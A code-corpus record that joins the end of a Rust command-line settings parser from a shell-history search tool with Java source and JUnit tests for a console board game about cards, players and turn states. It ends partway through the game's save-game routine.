                settings.dir = env::var("PWD").unwrap_or_else(|err| {
                    panic!(
                        "McFly error: Unable to determine current directory ({})",
                        err
                    )
                });
            }
            if let Some(old_dir) = add_matches.value_of("old_directory") {
                settings.old_dir = Some(old_dir.to_string());
            } else {
                settings.old_dir = env::var("OLDPWD").ok();
            }
            if let Some(commands) = add_matches.values_of("command") {
                settings.command = commands.collect::<Vec<_>>().join(" ");
            } else {
                settings.command = shell_history::last_history_line(
                    &settings.mcfly_history,
                    settings.history_format,
                )
                .unwrap_or_default();
            }
            // CD shows PWD as the resulting directory, but we want it from the source directory.
            if settings.command.starts_with("cd ")
                || settings.command.starts_with("pushd ")
                || settings.command.starts_with("j ")
            {
                settings.dir = settings.old_dir.to_owned().unwrap_or(settings.dir);
            }
        }
        ("search", Some(search_matches)) => {
            settings.mode = Mode::Search;
            if let Some(dir) = search_matches.value_of("directory") {
                settings.dir = dir.to_string();
            } else {
                settings.dir = env::var("PWD").unwrap_or_else(|err| {
                    panic!(
                        "McFly error: Unable to determine current directory ({})",
                        err
                    )
                });
            }
            // Environment first, then the flag so the flag wins.
            if let Ok(results) = env::var("MCFLY_RESULTS") {
                if let Ok(results) = u16::from_str(&results) {
                    settings.results = results;
                }
            }
            if let Ok(results) = value_t!(search_matches.value_of("results"), u16) {
                settings.results = results;
            }
            // MCFLY_FUZZY accepts a weight or any non-"false" truthy value.
            if let Ok(fuzzy) = env::var("MCFLY_FUZZY") {
                if let Ok(fuzzy) = i16::from_str(&fuzzy) {
                    settings.fuzzy = fuzzy;
                } else if fuzzy.to_lowercase() != "false" {
                    settings.fuzzy = 2;
                }
            }
            if let Ok(fuzzy) = value_t!(search_matches.value_of("fuzzy"), i16) {
                settings.fuzzy = fuzzy;
            } else if search_matches.is_present("fuzzy") {
                settings.fuzzy = 2;
            }
            settings.delete_without_confirm = search_matches
                .is_present("delete_without_confirm")
                || env::var("MCFLY_DELETE_WITHOUT_CONFIRM").is_ok();
            settings.output_selection = search_matches
                .value_of("output_selection")
                .map(|s| s.to_owned());
            if let Some(values) = search_matches.values_of("command") {
                settings.command = values.collect::<Vec<_>>().join(" ");
            } else {
                // No explicit search term: take it from the last history
                // line (written as a "#mcfly:" comment by the shell hook)
                // and then remove that line from the history file.
                settings.command = shell_history::last_history_line(
                    &settings.mcfly_history,
                    settings.history_format,
                )
                .unwrap_or_default()
                .trim_start_matches("#mcfly: ")
                .trim_start_matches("#mcfly:")
                .to_string();
                shell_history::delete_last_history_entry_if_search(
                    &settings.mcfly_history,
                    settings.history_format,
                    settings.debug,
                );
            }
        }
        ("train", Some(train_matches)) => {
            settings.mode = Mode::Train;
            settings.refresh_training_cache = train_matches.is_present("refresh_cache");
        }
        ("move", Some(move_matches)) => {
            settings.mode = Mode::Move;
            settings.old_dir = Some(String::from(
                move_matches
                    .value_of("old_dir_path")
                    .unwrap_or_else(|| panic!("McFly error: Expected value for old_dir_path")),
            ));
            settings.dir = String::from(
                move_matches
                    .value_of("new_dir_path")
                    .unwrap_or_else(|| panic!("McFly error: Expected value for new_dir_path")),
            );
        }
        ("init", Some(init_matches)) => {
            settings.mode = Mode::Init;
            match init_matches.value_of("shell").unwrap() {
                "bash" => {
                    settings.init_mode = InitMode::Bash;
                }
                "zsh" => {
                    settings.init_mode = InitMode::Zsh;
                }
                "fish" => {
                    settings.init_mode = InitMode::Fish;
                }
                _ => unreachable!(),
            }
        }
        ("", None) => println!("No subcommand was used"), // If no subcommand was used it'll match the tuple ("", None)
        _ => unreachable!(), // If all subcommands are defined above, anything else is unreachable!()
    }

    // Boolean env toggles: presence of the variable (any value) enables.
    settings.lightmode = env::var_os("MCFLY_LIGHT").is_some();
    settings.disable_menu = env::var_os("MCFLY_DISABLE_MENU").is_some();
    settings.key_scheme = match env::var("MCFLY_KEY_SCHEME").as_ref().map(String::as_ref) {
        Ok("vim") => KeyScheme::Vim,
        _ => KeyScheme::Emacs,
    };
    settings
}
/// Location of the on-disk training cache inside the storage directory.
pub fn mcfly_training_cache_path() -> PathBuf {
    Settings::storage_dir_path().join("training-cache.v1.csv")
}
/// `~/.mcfly` — panics when the home directory cannot be resolved.
pub fn storage_dir_path() -> PathBuf {
    let home = home_dir()
        .unwrap_or_else(|| panic!("McFly error: Unable to access home directory"));
    home.join(".mcfly")
}
/// Location of the SQLite history database inside the storage directory.
pub fn mcfly_db_path() -> PathBuf {
    Settings::storage_dir_path().join("history.db")
}
}
| 7c18020b5135d9c5fc13b6643743a835586e41cf | [
"TOML",
"Rust",
"Shell"
] | 4 | TOML | nfultz/mcfly | 048fd43561a73f46fdb614d1efd24199811efd55 | 8b70430c845354116904b4e78539149f5ecb5f91 |
refs/heads/master | <file_sep>package ca.concordia.game.gameState;
import java.util.ArrayList;
import ca.concordia.game.main.Game;
import ca.concordia.game.model.CityCard;
import ca.concordia.game.model.Deck;
import ca.concordia.game.model.Gameboard;
import ca.concordia.game.model.GreenCard;
import ca.concordia.game.model.PersonalityCard;
import ca.concordia.game.model.Player;
import ca.concordia.game.model.Symbol;
import ca.concordia.game.util.Configuration;
public class StatePlay implements StateLike {
/**
* This player holds current instance of the player.
* It will be re-initialized with performAction - function.
*/
private Player currentPlayer;
private Game currentGame;
private Gameboard gameBoard;
private StateContext currentContext;
private ArrayList<CityCard> cityCards;
private boolean replayCityCards = false;
/**
 * Runs one full "play" turn for {@code player}: checks the winning
 * condition, lets the player use active city cards, then repeatedly
 * plays green cards (executing each card's action symbols in order)
 * until no card grants another play. Finally advances the state machine
 * to the draw-card state.
 *
 * All user interaction happens through {@code game.keyIn} (console).
 */
@Override
public void performAction(StateContext context, Player player, Game game) {
    // Cache turn context on the instance for use by playCityCards().
    currentPlayer = player;
    currentGame = game;
    currentContext = context;
    gameBoard = game.getGameBoard();
    int cardNumberInPlayerHand;
    boolean playAnotherCard = true;
    // Check winning condition at the beginning of each turn.
    boolean wonGame=player.checkWinningCondition(gameBoard);
    if(wonGame){
        // Current player wins: announce and fall through to the state change.
        PersonalityCard pCard = (PersonalityCard)player.getPersonality();
        printGameWon( player, pCard );
    } else{
        Deck discardDeck = null;
        // Display gameboard and player status.
        System.out.println(gameBoard.toString());
        System.out.println(player.toString());
        // Offer the player's city cards; only active ones may be played.
        cityCards = player.getPlayerCityCard();
        replayCityCards = false;
        if(cityCards.size() > 0 ) {
            playCityCards();
        }
        // Play cards until the last card played does not grant another play.
        while(playAnotherCard){
            playAnotherCard = false;
            // Prompt until the player picks a valid hand index.
            while (true) {
                System.out.println("Please enter the card number you wish to play(Select the number for 'Position in Player Hand'):");
                cardNumberInPlayerHand = game.keyIn.nextInt();
                if (cardNumberInPlayerHand > player.getPlayerCards().size() - 1) {
                    System.out.println("Incorrect input please select a number between 0 and "+ (player.getPlayerCards().size() - 1));
                } else {
                    break;
                }
            }
            // Resolve the chosen card and its action symbols.
            GreenCard chosenCard = (GreenCard) player.getPlayerCards().get(cardNumberInPlayerHand);
            ArrayList<Symbol> actionSymbols = chosenCard.getActionsSymbols();
            // Execute each symbol action sequentially; mandatory symbols
            // run without asking, optional ones require a yes/no answer.
            String userAwnser;
            for (int i = 0; i < actionSymbols.size(); i++) {
                Symbol symbol = actionSymbols.get(i);
                System.out.println(symbol.getDescription());
                if( symbol.getIsMandatory() ){
                    System.out.println("This action is mandatory.");
                    playAnotherCard = actionSymbols.get(i).useSymbol(player, game, chosenCard.getNumber());
                } else {
                    System.out.println("Would you like to use this action(yes/no)?");
                    userAwnser = game.keyIn.next();
                    if (userAwnser.contains("y")) {
                        playAnotherCard=actionSymbols.get(i).useSymbol(player, game, chosenCard.getNumber());
                        System.out.println(gameBoard.toString());
                    } else {
                        System.out.println("Action Skipped.");
                    }
                }
            }//for
            // The used card goes to the discard deck and leaves the hand.
            discardDeck=game.getEspecificDeck("discard");
            discardDeck.putCard(chosenCard);
            boolean check=player.removePlayerCard(chosenCard);
            if(check){
                System.out.println("Card Was put to discard deck and removed from player's hand.");
            }
            // Re-offer city cards the player previously declined.
            if( replayCityCards == true ){
                playCityCards();
            }
        }//while
        // Final status dump for this turn.
        game.printCurrentState();
        System.out.println(gameBoard.toString());
        System.out.println(player.toString());
    }//if
    // Turn over: move the player's state machine to "draw card".
    context.setState(new StateDrawCard());
}
/**
 * Identifies this state.
 *
 * @return the play-state constant from {@link Configuration}
 */
@Override
public String getStatus() {
    return Configuration.STATE_PLAY;
}
/**
 * Announces that {@code player} has won, printing the player's color,
 * personality card and its winning condition, followed by a banner.
 *
 * @param player the winning player
 * @param pCard  the player's personality card
 */
private void printGameWon( Player player, PersonalityCard pCard){
    System.out.println("Player: "+player.getColor()+" with personality card:"+pCard.getName()+ " and Winning Condition: "+pCard.getWinningConditionDescription());
    // The banner line was previously copy-pasted nine times (each with a
    // stray trailing ";;"); a loop produces byte-identical output.
    for (int i = 0; i < 9; i++) {
        System.out.println("**************************************************HAS WON THE GAME*************************************************************");
    }
}
/**
 * Offers every active city card in the current player's hand for play,
 * reading a yes/no answer from the console for each.
 *
 * NOTE(review): {@code replayCityCards} is overwritten on every active
 * card, so after the loop it only reflects the answer for the LAST
 * active card (true = declined, prompting a re-offer later). If the
 * intent is "re-offer when ANY card was declined", this needs an
 * accumulating OR — TODO confirm intended behavior.
 */
private void playCityCards(){
    for(int i=0;i<cityCards.size();i++){
        // A city card has to be active in order to be played.
        if(cityCards.get(i).getIsActive()){
            System.out.println("Player: "+currentPlayer.getColor()+" do you wish to use city card: "+cityCards.get(i).getName()+" with ability:"+cityCards.get(i).getAbility()+"Card Number: "+cityCards.get(i).getCardNumber());
            String input = currentGame.keyIn.next();
            if(input.contains("y")){
                System.out.println("Executing Card...");
                cityCards.get(i).useCityCard(currentPlayer, currentGame);//Use card if the player choose to use it.
                replayCityCards = false;
            }else{
                // Declined: remember so the card can be re-offered later.
                replayCityCards = true;
            }
        }
    }
}
}<file_sep>package ca.concordia.game.model;
import java.util.ArrayList;
import ca.concordia.game.common.common.Colors;
import ca.concordia.game.util.*;
/**
* Brown card is a type of Card.
* The brown card contains a unique number,the color brown, and array of the symbols that specify the actions that have to be followed sequentially,
* and a description of the cards especialAbility(Action) if one exits(There area cards that don't have any especial action).For a description of the
* symbol actions see the Symbol class.
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME> <NAME>
* @author <NAME>
*/
public class BrownCard extends Card {
private Colors color;
private int number;
private String name;
private ArrayList<Symbol> symbols;
private String especialAbility;
/**
 * Builds a brown-bordered player card from the card-loader data for
 * {@code cardId}: name, special ability text, and the ordered list of
 * action symbols decoded from the loader's symbol string.
 *
 * Symbol encoding: each character is a symbol id digit, except 'M',
 * which encodes symbol 5 (take money from the bank) and is followed by
 * a single digit giving the amount to take.
 *
 * @param cardId unique brown-card number used to look up the card data
 */
public BrownCard(int cardId) {
    // Brown cards start face up and unprotected.
    super(false, false);
    this.symbols = new ArrayList<Symbol>();
    this.color = Colors.BROWN;
    this.number = cardId;
    this.name = CardLoader.getInstance().nameForCard(cardId, 'B');
    this.especialAbility = CardLoader.getInstance().abilityForCard(cardId, 'B');
    String encoded = CardLoader.getInstance().symbolsForCard(cardId, 'B');
    // Some cards legitimately carry no action symbols.
    if (encoded.length() > 0 && !encoded.equals("NO Symbols AVAILABLE")) {
        for (int j = 0; j < encoded.length(); j++) {
            char token = encoded.charAt(j);
            if (token == 'M') {
                // 'M' is followed by the money amount; a trailing 'M'
                // with no amount digit is dropped (matches the old
                // parser, which also never emitted a symbol for it).
                if (j + 1 < encoded.length()) {
                    j++;
                    int amount = Integer.parseInt(Character.toString(encoded.charAt(j)));
                    // FIX: the previous parser read the amount digit but
                    // then always stored 5 (new Symbol(5, 5)); pass the
                    // parsed amount instead. TODO confirm against the
                    // Symbol(type, money) contract used below.
                    this.symbols.add(new Symbol(5, amount));
                }
            } else {
                // Plain one-digit symbol id; -1 means "no money attached".
                this.symbols.add(new Symbol(Integer.parseInt(Character.toString(token)), -1));
            }
        }
    }
}
/**
 * @return this card's unique number
 */
public int getNumber(){
    return this.number;
}
/**
 * @return this card's display name
 */
public String getName(){
    return this.name;
}
/**
 * @return the special-ability description text
 */
public String getAbility(){
    return this.especialAbility.toString();
}
/**
 * @return the card's border color (always {@code Colors.BROWN} as constructed)
 */
public Colors getColor() {
    return color;
}
/**
 * @param color new border color
 */
public void setColor(Colors color) {
    this.color = color;
}
/**
 * @return the ordered action symbols decoded from the card data
 */
public ArrayList<Symbol> getSymbols() {
    return symbols;
}
/**
 * @param symbols replacement action-symbol list
 */
public void setSymbols(ArrayList<Symbol> symbols) {
    this.symbols = symbols;
}
/**
 * @return the special-ability description text
 */
public String getEspecialAbility() {
    return especialAbility;
}
/**
 * @param especialAbility new special-ability description
 */
public void setEspecialAbility(String especialAbility) {
    this.especialAbility = especialAbility;
}
/**
 * @param number new unique card number
 */
public void setNumber(int number) {
    this.number = number;
}
/**
 * @param name new display name
 */
public void setName(String name) {
    this.name = name;
}
/**
 * @return a one-line summary: color, id, name and special-ability text
 */
public String toString()
{
    return String.format("%s. ID:%d %s. Description:%s",
            this.color, this.number, this.name, this.especialAbility);
}
}<file_sep>package ca.concordia.game.gui;
/**
* @todo Read the TileMap.tmx file and render the Map + Tiles to be used in the game
* @todo Give Controller and Game classes to interract with the board.
*
* @link http://jayskills.com/blog/2013/01/09/writing-a-tile-engine-in-javafx/
* @link http://silveiraneto.net/2009/12/19/tiled-tmx-map-loader-for-pygame/
* @link https://github.com/bjorn/tiled
* @link http://docs.oracle.com/javafx/2/canvas/jfxpub-canvas.htm
* @link http://docs.oracle.com/javase/8/javafx/graphics-tutorial/canvas.htm#JFXGR214
* @link http://docs.oracle.com/javase/8/javafx/fxml-tutorial/jfx2_x-features.htm
*
* This class draws the board on which the game is going to be played on.
* The board has two major areas:
* - Left hand-side : Map of the city(universe).
* - Right hand-side : The components of the city.
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
public class GameboardView {
    // Intentionally empty: the tile-map rendering described in the class
    // javadoc above has not been implemented yet.
}
<file_sep>package ca.concordia.game.gameState;
import ca.concordia.game.main.Game;
import ca.concordia.game.model.Player;
/**
* Class StateContext controls the starting state of a player and helps serialize the states a player will have troughout the game.
* <pre>
* All players start in the "waiting status"
* Once a player's turns is up, the Status changes from "waiting" to "playing".
* The state then continues to the "drawing card" state.
* Finally, the state goes back to the "waiting", which means it is the player's end of turn.
* </pre>
* The flow is as following:
* <pre>
* 1. Start at StateWait
* 2. Move to StatePlay
* 3. The to StateDraw
* 4. And back to StateWait
* </pre>
* @author Diego
*/
public class StateContext {
private StateLike playerState;
/**
* Constructor Starts the the player's state to wait.
*/
public StateContext() {
setState(new StateWait());
}
/**
* Setter method for the state.
* Normally only called by classes implementing the State interface.
* Further used to determined flow of states.
* @param newState the new state of this context
*/
public void setState(final StateLike newState) {
playerState = newState;
}
/**
*
* @return String
*/
public String getState()
{
return playerState.getStatus();
}
public void performAction(Player player, Game game) {
playerState.performAction(this, player, game);
}
}
<file_sep>package ca.concordia.game;
import static org.junit.Assert.*;
import org.junit.Test;
import ca.concordia.game.gameState.*;
import ca.concordia.game.util.Configuration;
public class GameUtilTest {
@Test
public void canInitializeStates(){
    // Each concrete state must implement StateLike and report the
    // status constant configured for it.
    final StatePlay play = new StatePlay();
    final StateDrawCard draw = new StateDrawCard();
    final StateWait wait = new StateWait();
    assertTrue( "StatePlay is type of StateLike ", play instanceof StateLike );
    assertTrue( "StateDrawCard is type of StateLike ", draw instanceof StateLike );
    assertTrue( "StateWait is type of StateLike ", wait instanceof StateLike );
    assertEquals("StatePlay has Playing status", play.getStatus(), Configuration.STATE_PLAY);
    assertEquals("StateDrawingCard has Drawing status", draw.getStatus(), Configuration.STATE_DRAWING);
    assertEquals("StateWait has waiting status", wait.getStatus(), Configuration.STATE_WAIT);
}
}<file_sep>package ca.concordia.game;
import static org.junit.Assert.*;
import java.awt.Color;
import org.junit.After;
import org.junit.AfterClass;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Test;
import java.util.ArrayList;
import ca.concordia.game.common.common.Colors;
import ca.concordia.game.main.*;
import ca.concordia.game.model.*;
import ca.concordia.game.util.Configuration;
/**
* The Player will evaluate the winning condition
* 1. Each player must be given $10, 6 building pieces and 12 minions.
* 2. The Player cards must be shuffled (the green-bordered cards and the brown-bordered cards must be shuffled independently, and then combined into a single deck with the green-bordered on top).
* 3. The Personality cards must be shuffled.
* 4. The Random Event cards must be shuffled.
* 5. One Personality card and five (green-bordered) Player cards must be dealt to each player.
* 6. Each player must place one minion in area 1 (Dolly Sisters), area 5 (The Scours) and area 7 (The Shades).
* 7. A trouble marker must be placed in each of the same three areas.
*/
public class PlayerTest {
Game game;
Gameboard gameboard;
Player dpizar;
Player gamest;
/**
* Adding areas to play against
*/
Area dollySisters;
Area theScours;
Area theShades;
int MINIONS = 12;
int MONEY = 10;
int BUILDINGS = 6;
@BeforeClass
public static void setup(){
    // No class-level fixtures are needed; kept for JUnit lifecycle symmetry.
}
/**
 * Per-test fixture: a game instance, the three starting trouble areas
 * (Dolly Sisters, The Scours, The Shades), two players with personality
 * cards, and a gameboard holding both players.
 */
@Before
public void starts(){
    game = Game.getInstance();
    // Shared area parameters: no demons, trouble marker present.
    int demon = 0;
    Colors buildingColor = Colors.BLUE;
    boolean building = false; // NOTE(review): unused local — kept as-is.
    boolean troubleMarker = true;
    // Creating the areas (city-card ids 1, 5 and 7).
    dollySisters = new Area(new CityCard(1), troubleMarker, buildingColor, demon, 0);
    theScours = new Area(new CityCard(5), troubleMarker, buildingColor, demon, 0);
    theShades = new Area(new CityCard(7), troubleMarker, buildingColor, demon, 0);
    // Creating personality cards and the two players.
    PersonalityCard lordVetinari = new PersonalityCard(0, 2);
    PersonalityCard lordSelachii = new PersonalityCard(1, 2);
    dpizar = new Player( lordVetinari, Colors.GREEN, MINIONS, BUILDINGS);
    gamest = new Player( lordSelachii, Colors.GREEN, MINIONS, BUILDINGS);
    /**
     * @todo - load game players by assigning them via a function rather than a console on terminal
     * game.init();
     */
    Player[] players = new Player[]{ dpizar, gamest };
    gameboard = new Gameboard( players );
}
@Test
public void playerInitialState(){
assertEquals( "10 bucks in bank", dpizar.calculateNetWorth(gameboard), gamest.calculateNetWorth(gameboard) );
gamest.addMoney(MONEY);
assertTrue( gamest.getMoney() == MONEY );
dpizar.addMoney(MONEY);
assertTrue( dpizar.getMoney() == MONEY );
assertTrue("Player dpizar has minion in Dolly Sisters(1)", dpizar.putNewMinionOnBoard(1,false) );
assertTrue("Player dpizar has minion in The Scours(5)", dpizar.putNewMinionOnBoard(5,false) );
assertTrue("Player dpizar has minion in The Shades(7)", dpizar.putNewMinionOnBoard(7,false) );
assertTrue("Player gamest has minion in Dolly Sisters(1)", gamest.putNewMinionOnBoard(1,false) );
assertTrue("Player gamest has minion in The Scours(5)", gamest.putNewMinionOnBoard(5,false) );
assertTrue("Player gamest has minion in The Shades(7)", gamest.putNewMinionOnBoard(7,false) );
//three regions have to have a trouble marker
assertTrue("Dolly Sisters has a trouble marker", dollySisters.getTroubleMarker());
assertTrue("The Scours has a trouble marker", theScours.getTroubleMarker());
assertTrue("The Shades has a trouble marker", theShades.getTroubleMarker());
//
assertTrue( gamest.toString().length() > 0 );
assertTrue( dpizar.toString().length() > 0 );
assertTrue( dollySisters.toString().length() > 0 );
assertTrue( theScours.toString().length() > 0 );
assertTrue( theShades.toString().length() > 0 );
}
@Test public void testPlayerActions(){
//assertNotNull( new Action(Configuration.BROWN_CARD_1_SERGEANT_CHEERY_LITTLEBOTTOM) );
}
@Test
public void winningConditions(){
assertEquals( "10 bucks in bank", dpizar.calculateNetWorth(gameboard), gamest.calculateNetWorth(gameboard) );
dpizar.transferMoneyto(1, gamest);
assertNotEquals( "Player dpizar can transfer money to gamest" , dpizar.calculateNetWorth(gameboard), gamest.calculateNetWorth(gameboard) );
assertFalse("Player 2 has not winning conditions", gamest.checkWinningCondition(gameboard) );
assertFalse("Player 1 has not winning conditions", dpizar.checkWinningCondition(gameboard) );
/**
* The winning condition :
* - For <NAME>, he has to have 11 minions in a 2 players game.
*/
dpizar.putNewMinionOnBoard(2,false);
dpizar.putNewMinionOnBoard(3,false);
dpizar.putNewMinionOnBoard(4,false);
dpizar.putNewMinionOnBoard(6,false);
dpizar.putNewMinionOnBoard(8,false);
dpizar.putNewMinionOnBoard(9,false);
dpizar.putNewMinionOnBoard(10,false);
dpizar.putNewMinionOnBoard(11,false);
dpizar.putNewMinionOnBoard(12,false);
assertTrue(" <NAME> - played by dpizar - wins the game with 11 minions ", dpizar.checkWinningCondition(gameboard) );
}
@After
public void stops(){
}
@AfterClass
public static void teardown(){
}
}
<file_sep>package ca.concordia.game.main;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import java.util.Scanner;
import java.util.concurrent.atomic.AtomicInteger;
import ca.concordia.game.gameState.StateContext;
import ca.concordia.game.model.*;
import ca.concordia.game.util.*;
import ca.concordia.game.common.common;
import ca.concordia.game.common.common.Colors;
/**
* Game class creates a new game, loads and saves a game state. Further it
* specifies and controls the logic required to play a game.
*
* @author <NAME>
* @author <NAME>
* @author <NAME>
* @author <NAME> <NAME>
* @author <NAME>
*/
public class Game {
private static Game instance = null; // singleton instance, created lazily in getInstance()
/**
 * Per-player state machines: the state each player is in at the moment,
 * and the actions he can perform.
 */
private ArrayList<StateContext> playerStatus;
private Gameboard gameboard;          // the single board for this game
private Map<String, Deck> decks;      // keyed "discard"/"personalities"/"events"/"green"/"brown"
private Bank bank;                    // shared bank singleton
private Die die;
private ArrayList<Symbol> symbols;
// NOTE(review): the trailing second ';' is a harmless empty declaration.
public Scanner keyIn= new Scanner(System.in);; // shared console input; never closed (see play())
public int currentPlayer;             // index into players[]; -1 until a starter is chosen
public int numberOfPlayers;           // read from console in init() or from file in loadGame()
private Player[] players;
/**
 * This function initializes a new Game - Since the current player is not
 * yet determined, it sets currentPlayer to -1 - Creates a new Instance of
 * Bank. Note the Bank has to be unique. - Initializes the balance to
 * Initial Balance of 120. - Initializes the Scanner instance to be used in
 * the game - Initializes the number of players via CLI
 */
public String init() {
    currentPlayer = -1; // no starter yet; play() rolls dice to pick one
    this.bank = Bank.getInstance();
    bank.setBankMoney(new AtomicInteger(Configuration.DEFAULT_BALANCE));
    // NOTE(review): prompt and return strings contain typos ("Maximun",
    // "succssessfull"); left untouched since they are runtime output.
    System.out.println("Please select number of players(Maximun => 4):");
    numberOfPlayers = keyIn.nextInt(); // no range validation — TODO confirm callers guard this
    this.symbols = new ArrayList<Symbol>();
    //All symbols are initialize in the Green or Brown card classes.
    // Close Scanner object
    // keyIn.close();//Don't close until done using in whole proyect.
    // Build the five decks; keys are lowercase and relied on elsewhere.
    this.decks = new HashMap<String, Deck>();
    this.decks.put("discard", new Deck("D", numberOfPlayers));
    this.decks.put("personalities", new Deck("P", numberOfPlayers));
    this.decks.put("events", new Deck("E", numberOfPlayers));
    this.decks.put("green", new Deck("G", numberOfPlayers));
    this.decks.put("brown", new Deck("B", numberOfPlayers));
    // Select number of players and their colors.
    // For now we use four players of fixed colors:
    this.players = new Player[numberOfPlayers];
    for (int i = 0; i < numberOfPlayers; i++) {
        // Each player: one personality card, a fixed colour, 12 minions, 6 buildings.
        this.players[i] = new Player((PersonalityCard) decks.get("personalities").getCard(),
                Colors.colorForIndex(i), 12, 6);
        // Deal 5 green cards to each player:
        decks.get("green").dealCardsToPlayer(players[i], 5);
        // Give $10 to each player:
        bank.transferFunds(players[i], 10);
    }
    // Depending on the number of players initialize their States(to wait).
    playerStatus = new ArrayList<StateContext>();// put on heap.
    for (int i = 0; i < numberOfPlayers; i++) {
        playerStatus.add(new StateContext());
        System.out.println("Player:" + players[i].getColor() + " Current State:" + playerStatus.get(i).getState());
        /**
         * Set to next state(Play State.)So players are ready to play when
         * their turn comes up.
         */
        playerStatus.get(i).performAction(players[i], this);
    }
    // Initialize Gameboard:
    this.gameboard = new Gameboard(this.players);
    this.die = new Die();
    return "Initialization was succssessfull";
}
// Start playing game instance.
/**
 * Main game loop. If the game is fresh (not loaded), first rolls a die per
 * player to decide who starts; then repeatedly advances each player's state
 * machine until the user asks to exit, finally offering to save.
 *
 * @param loadedGame true when resuming a saved game (starter already known)
 */
public void play(boolean loadedGame) {
    if(!loadedGame)//If the game was not loaded.
    {
        Map<Integer, Colors> playerDieRollMap = new HashMap<Integer, Colors>();
        ArrayList<Integer> playerDieRoll = new ArrayList<Integer>();
        int rollValue = -1;
        // roll dice for each player to pick first player.
        for (int i = 0; i < this.numberOfPlayers; i++) {
            rollValue = die.roll();// roll dice for player.
            System.out.println("Player with color: " + this.players[i].getColor() + " rolled:" + rollValue);
            playerDieRoll.add(rollValue);// store value gotten by player.
            /**
             * Store Player color,roll value pair.
             * NOTE(review): the roll is the map KEY, so two players rolling
             * the same value collide and the later player wins ties — TODO
             * confirm this is the intended tie-break.
             */
            playerDieRollMap.put(rollValue, this.players[i].getColor());
        }
        int highestRoll = highestValue(playerDieRoll);
        Colors startingColor = playerDieRollMap.get(highestRoll);
        System.out.println("The player with the color:" + startingColor + " starts the game.");
        // Set the pointer to the starting player in the array.
        for (int i = 0; i < this.numberOfPlayers; i++) {
            // Found a match
            if (this.players[i].getColor().equals(startingColor)) {
                currentPlayer = i;
                break;
            }
        }
    }
    // Keep going until a player wins the game.
    while (true){
        System.out.println();
        System.out.println("**************************************Game has begun!!!!!!************************************");
        System.out.println();
        // Start Playing select the player who's turn it is.
        this.playerStatus.get(currentPlayer).performAction(players[currentPlayer], this);
        System.out.println("Player:" + players[currentPlayer].getColor() + " Current State:"
                + playerStatus.get(currentPlayer).getState());
        // Draw Cards State
        this.playerStatus.get(currentPlayer).performAction(players[currentPlayer], this);
        System.out.println("Player:" + players[currentPlayer].getColor() + " Current State:"
                + playerStatus.get(currentPlayer).getState());
        // Third transition: back to the waiting/play state for next round.
        this.playerStatus.get(currentPlayer).performAction(players[currentPlayer], this);
        System.out.println("Player:" + players[currentPlayer].getColor() + " Current State:"
                + playerStatus.get(currentPlayer).getState());
        currentPlayer = nextPlayer();
        System.out.println("Do you wish to exit?? Enter -1, otherwise enter 1.");
        int exit = this.keyIn.nextInt();
        if (exit < 1) {
            break;
        }
    }
    System.out.println("Do you wish to save the current game?");
    String save=this.keyIn.next();
    if(save.contains("y"))
    {
        System.out.println("Preparing to save game.");
        this.saveGame();
    }else
    {
        System.out.println("You chose not to save the game.The game state has been lost.");
    }
    //don't close beacue a game might be loaded.
    //this.keyIn.close();
}
/**
 * Return the highest value in an Arraylist of integers.
 *
 * @param arrayList non-empty list of die rolls; a NoSuchElementException is
 *                  thrown if it is empty
 * @return int the maximum element
 */
public int highestValue(ArrayList<Integer> arrayList) {
    // BUG FIX: the previous implementation called Collections.sort on the
    // caller's list just to read the last element — an O(n log n) operation
    // that also mutated the argument as a side effect. Collections.max is a
    // single O(n) pass and leaves the caller's list untouched.
    return Collections.max(arrayList);
}
/**
* Implements Game as a singleton, as there will always be a single game per run.
* @return Game
*/
public static Game getInstance() {
    // Lazy singleton: construct on first request, reuse afterwards.
    if (instance != null) {
        return instance;
    }
    instance = new Game();
    return instance;
}
/**
* Constructor, initializes a new game.
*/
protected Game() { }
/**
* @deprecated - this object comparator has not been used, and should retire
* @param gameState
* @return
*/
public boolean equals(Game gameState) {
    // NOTE(review): this is an overload, not an override of Object.equals,
    // and it unconditionally reports false; retained only because it is
    // marked @deprecated above.
    return false;
}
/**
* This function - Sets currentPlayer - Returns the player who's turn is up.
*
* @return int currentPlayer
*/
public int nextPlayer() {
    // Advance the turn pointer, wrapping back to player 0 after the last.
    int upNext = (this.currentPlayer + 1) % this.numberOfPlayers;
    this.currentPlayer = upNext;
    return upNext;
}
/**
 * Save the current game state to disk, in the format expected by loadGame().
 */
public String saveGame() {
    // Serializes the game as CSV lines: 12 area lines, a player-count line,
    // one line per player, then the bank balance. loadGame() parses this
    // layout positionally, so the order below must not change.
    //temporal variables.
    String temp = "";
    ArrayList<String> content = new ArrayList<String>();
    BrownCard bCard;
    GreenCard gCard;
    // Store GameBoard's Info: one CSV line per area.
    for (int i = 0; i < 12; i++) {
        temp = temp + this.gameboard.getAreas().get(i).getCityCard().getName() + ",";
        temp = temp + this.gameboard.getAreas().get(i).getTroubleMarker() + ",";
        temp = temp + this.gameboard.getAreas().get(i).getBuildingColor() + ",";
        temp = temp + this.gameboard.getAreas().get(i).getDemon() + ",";
        temp = temp + this.gameboard.getAreas().get(i).getTroll() + ",";
        // Get Minions of each class: append one colour token per minion.
        for (int j = 0; j < this.gameboard.getAreas().get(i).getMinions().size(); j++) {
            temp = temp + this.gameboard.getAreas().get(i).getMinions().get(j).getColor() + ",";
        }
        // remove last coma
        temp = removeLastChar(temp);
        // Store new Area info into the content array
        content.add(temp);
        temp = "";
    }
    // Store Player's Info.
    temp = temp + this.players.length;// Get totalNumber of players.
    content.add(temp);
    temp = "";
    for (int i = 0; i < this.players.length; i++) {
        // cardId is 1-based; -1 converts it back to the constructor index
        // used by "new PersonalityCard(index, players)" in loadGame().
        int personalityId=((PersonalityCard) this.players[i].getPersonality()).getCardId() -1;
        temp = temp + personalityId + ",";
        temp = temp + this.players[i].getColor() + ",";
        temp = temp + this.players[i].getMinionsOnHand() + ",";
        temp = temp + this.players[i].getBuildingOnHand() + ",";
        temp = temp + this.players[i].getMoney() + ",";
        temp = temp + this.players[i].getPlayerCards().size() + ",";
        for (int j = 0; j < this.players[i].getPlayerCards().size(); j++) {
            if (this.players[i].getPlayerCards().get(j).getClass().toString().contains("BrownCard")) {
                // The card is of type BrownCard, convert to brown card.
                bCard = (BrownCard) this.players[i].getPlayerCards().get(j);
